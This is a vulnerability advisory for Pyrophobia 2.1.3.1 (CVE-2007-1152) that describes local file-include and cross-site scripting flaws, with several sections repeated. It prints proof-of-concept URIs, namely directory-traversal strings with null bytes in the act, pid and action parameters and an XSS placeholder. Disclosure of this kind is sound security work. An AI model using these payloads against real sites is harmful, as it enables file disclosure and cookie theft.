Pyrophobia Multiple Input Validation Vulnerabilities
BID:22667
Info
Pyrophobia Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 22667 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1152 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 22 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | laurent gaffie is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Pyrophobia Pyrophobia 2.1.3.1 |
| Not Vulnerable: | |
Discussion
Pyrophobia Multiple Input Validation Vulnerabilities
Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues.
An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and execute local scripts within the context of the affected webserver. Other attacks are also possible.
Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues.
An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and execute local scripts within the context of the affected webserver. Other attacks are also possible.
Exploit / POC
Pyrophobia Multiple Input Validation Vulnerabilities
To exploit a cross-site scritping issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URI is available:
http://www.example.com/modules/out.php?id=[xss]
To exploit a local file-include issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/pyrophobia/?act=../../../../../../../../../../../../file.ext00
http://www.example.com/pyrophobia/?pid=../../../../../../../../../../../../file.ext%00
http://www.example.com/pyrophobia/admin/index.php?action=../../../../../../../../../../../../../file.ext%00
To exploit a cross-site scritping issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URI is available:
http://www.example.com/modules/out.php?id=[xss]
To exploit a local file-include issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/pyrophobia/?act=../../../../../../../../../../../../file.ext00
http://www.example.com/pyrophobia/?pid=../../../../../../../../../../../../file.ext%00
http://www.example.com/pyrophobia/admin/index.php?action=../../../../../../../../../../../../../file.ext%00
Solution / Fix
Pyrophobia Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].